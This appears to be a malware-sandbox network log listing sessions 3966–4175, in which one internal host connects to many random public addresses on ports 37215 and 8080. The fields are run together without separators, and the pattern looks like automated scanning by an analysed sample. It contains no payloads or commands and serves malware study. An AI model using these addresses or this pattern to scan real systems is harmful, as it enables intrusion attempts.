                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3966192.168.2.234830641.3.8.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3967192.168.2.2346316157.158.87.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3968192.168.2.235049448.36.99.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3969192.168.2.235303441.193.128.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3970192.168.2.233599241.73.177.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3971192.168.2.234150031.124.239.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3972192.168.2.2333268153.2.105.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3973192.168.2.2352504197.47.69.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3974192.168.2.2352080211.6.233.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3975192.168.2.2339680197.25.45.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3976192.168.2.2340130157.218.71.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3977192.168.2.2357950157.53.72.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3978192.168.2.2344900197.61.136.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3979192.168.2.2339574157.73.110.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3980192.168.2.2360626197.54.32.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3981192.168.2.2350980157.81.60.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3982192.168.2.234999071.246.95.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3983192.168.2.234787441.245.166.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3984192.168.2.2339150157.158.240.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3985192.168.2.235907041.85.6.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3986192.168.2.235590641.203.14.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3987192.168.2.234567641.25.72.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3988192.168.2.234234441.35.167.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3989192.168.2.2338446157.18.91.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3990192.168.2.2351724157.207.158.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3991192.168.2.2355306157.129.5.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3992192.168.2.2353130115.83.47.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3993192.168.2.2344004165.195.145.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3994192.168.2.2336744197.229.254.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3995192.168.2.2345866197.216.229.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3996192.168.2.2353570197.222.33.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3997192.168.2.2344290157.231.218.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3998192.168.2.2342820197.131.106.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3999192.168.2.233932070.7.158.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4000192.168.2.2335374157.251.200.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4001192.168.2.234054641.203.188.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4002192.168.2.2358998157.63.58.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4003192.168.2.235199641.205.175.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4004192.168.2.233697648.238.5.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4005192.168.2.233688013.241.47.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4006192.168.2.235864635.179.129.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4007192.168.2.2338604109.147.223.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4008192.168.2.2355748190.84.52.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4009192.168.2.234850083.175.163.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4010192.168.2.235169485.162.174.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4011192.168.2.2356554172.153.27.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4012192.168.2.2332910138.176.153.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4013192.168.2.2353242135.217.102.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4014192.168.2.2355516163.201.142.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4015192.168.2.235135447.134.117.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4016192.168.2.2334746186.181.203.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4017192.168.2.2333906129.173.110.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4018192.168.2.235605673.176.140.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4019192.168.2.2357022121.78.21.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4020192.168.2.2347356143.71.219.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4021192.168.2.233918298.213.195.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4022192.168.2.235495876.119.133.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4023192.168.2.2342896110.160.151.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4024192.168.2.235030479.4.50.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4025192.168.2.2351442124.21.215.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4026192.168.2.2356028133.219.34.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4027192.168.2.233552414.119.175.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4028192.168.2.2356120108.60.69.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4029192.168.2.235893645.156.208.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4030192.168.2.234129871.252.252.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4031192.168.2.2343536109.171.225.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4032192.168.2.2357940185.21.184.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4033192.168.2.2335898164.93.221.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4034192.168.2.2346970154.191.60.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4035192.168.2.233762420.242.58.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4036192.168.2.234946667.99.48.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4037192.168.2.2342866120.206.47.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4038192.168.2.2346542143.192.225.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4039192.168.2.2347104139.237.134.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4040192.168.2.234384890.188.146.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4041192.168.2.2335432103.236.62.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4042192.168.2.234521682.231.26.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4043192.168.2.2338402111.66.206.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4044192.168.2.234537431.161.66.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4045192.168.2.2336144141.137.192.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4046192.168.2.2341304169.37.187.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4047192.168.2.2355822120.232.121.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4048192.168.2.2340808111.248.197.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4049192.168.2.2353180181.205.158.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4050192.168.2.235272499.202.25.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4051192.168.2.2340302198.52.62.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4052192.168.2.2336080139.54.210.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4053192.168.2.234819254.84.102.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4054192.168.2.2347534165.232.96.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4055192.168.2.2352914105.85.227.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4056192.168.2.2349090149.30.158.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4057192.168.2.2355346162.229.191.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4058192.168.2.235969083.82.130.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4059192.168.2.2336434145.91.170.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4060192.168.2.233984882.206.189.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4061192.168.2.2334916116.149.15.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4062192.168.2.233721684.46.77.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4063192.168.2.2335228167.1.128.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4064192.168.2.235428469.17.196.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4065192.168.2.234703260.169.190.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4066192.168.2.2345050144.14.19.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4067192.168.2.2336588164.225.130.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4068192.168.2.236082432.60.0.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4069192.168.2.2353000145.61.89.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4070192.168.2.235567892.91.90.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4071192.168.2.2335846133.26.200.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4072192.168.2.2347932110.40.11.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4073192.168.2.2353132170.105.10.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4074192.168.2.2335294117.232.190.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4075192.168.2.2352764191.85.80.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4076192.168.2.2348086172.227.26.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4077192.168.2.234912035.124.160.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4078192.168.2.235180650.68.67.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4079192.168.2.2356232212.8.4.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4080192.168.2.2358172158.15.37.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4081192.168.2.2349312179.36.159.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4082192.168.2.2358504183.166.171.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4083192.168.2.2347858223.61.42.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4084192.168.2.2360228139.229.38.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4085192.168.2.2348548180.206.45.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4086192.168.2.233422824.105.178.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4087192.168.2.234326663.41.11.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4088192.168.2.234977448.70.209.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4089192.168.2.2348346159.200.99.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4090192.168.2.235856866.223.116.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4091192.168.2.235356841.65.50.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4092192.168.2.2348568216.192.9.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4093192.168.2.2340676212.114.115.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4094192.168.2.2336596201.238.83.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4095192.168.2.2353438148.92.45.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4096192.168.2.2359118223.14.40.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4097192.168.2.233520082.79.130.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4098192.168.2.235437078.139.20.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4099192.168.2.2338122206.176.106.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4100192.168.2.234184642.35.162.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4101192.168.2.2341628130.197.46.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4102192.168.2.2351736182.96.237.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4103192.168.2.234621224.162.26.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4104192.168.2.2339896103.196.205.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4105192.168.2.235900488.161.26.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4106192.168.2.235224681.132.174.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4107192.168.2.2343690150.39.44.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4108192.168.2.234861451.92.137.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4109192.168.2.235729653.98.38.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4110192.168.2.2340736112.110.76.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4111192.168.2.235530678.89.242.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4112192.168.2.233473635.198.247.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4113192.168.2.2358182148.59.212.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4114192.168.2.2335178161.173.116.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4115192.168.2.235733677.93.222.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4116192.168.2.2354758176.96.119.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4117192.168.2.2357714139.220.145.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4118192.168.2.2334882211.14.25.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4119192.168.2.2334288134.61.63.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4120192.168.2.2342882142.4.123.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4121192.168.2.2338056125.230.110.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4122192.168.2.235862283.11.39.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4123192.168.2.234188298.159.107.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4124192.168.2.2359534223.143.17.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4125192.168.2.234245019.241.105.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4126192.168.2.2345662202.228.188.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4127192.168.2.233578237.91.195.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4128192.168.2.23556721.244.8.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4129192.168.2.2360182121.207.221.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4130192.168.2.235616654.142.103.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4131192.168.2.2338428120.244.200.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4132192.168.2.2343056163.74.61.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4133192.168.2.2335876223.135.84.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4134192.168.2.234350485.217.210.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4135192.168.2.23399229.143.26.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4136192.168.2.235618260.88.150.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4137192.168.2.2349856137.123.143.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4138192.168.2.233820881.11.49.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4139192.168.2.2354974119.168.114.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4140192.168.2.234823883.188.75.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4141192.168.2.2346180121.222.219.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4142192.168.2.235050619.154.161.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4143192.168.2.2351758143.19.193.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4144192.168.2.236060438.228.150.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4145192.168.2.235861085.87.46.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4146192.168.2.235028439.240.227.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4147192.168.2.2355052209.16.156.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4148192.168.2.2353172221.123.233.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4149192.168.2.235734296.157.81.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4150192.168.2.2345532168.216.193.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4151192.168.2.23558961.64.54.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4152192.168.2.234809094.95.216.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4153192.168.2.2347746204.49.88.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4154192.168.2.2358850210.186.169.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4155192.168.2.2352658112.10.204.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4156192.168.2.23373565.50.34.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4157192.168.2.234372252.28.65.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4158192.168.2.2354450104.174.220.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4159192.168.2.23417069.39.108.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4160192.168.2.234088024.22.129.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4161192.168.2.234955813.33.198.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4162192.168.2.2359152122.174.161.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4163192.168.2.235298446.109.201.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4164192.168.2.2343178208.158.37.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4165192.168.2.2353964196.145.150.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4166192.168.2.234331274.66.83.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4167192.168.2.2333304200.226.152.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4168192.168.2.2343350176.53.176.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4169192.168.2.2342336177.246.29.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4170192.168.2.2354124200.244.111.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4171192.168.2.2356058111.230.10.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4172192.168.2.2336052143.182.107.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4173192.168.2.2350552136.130.174.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4174192.168.2.234075672.8.253.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4175192.168.2.233814262.160.221.2548080
                                                        TimestampBytes transferredDirectionData


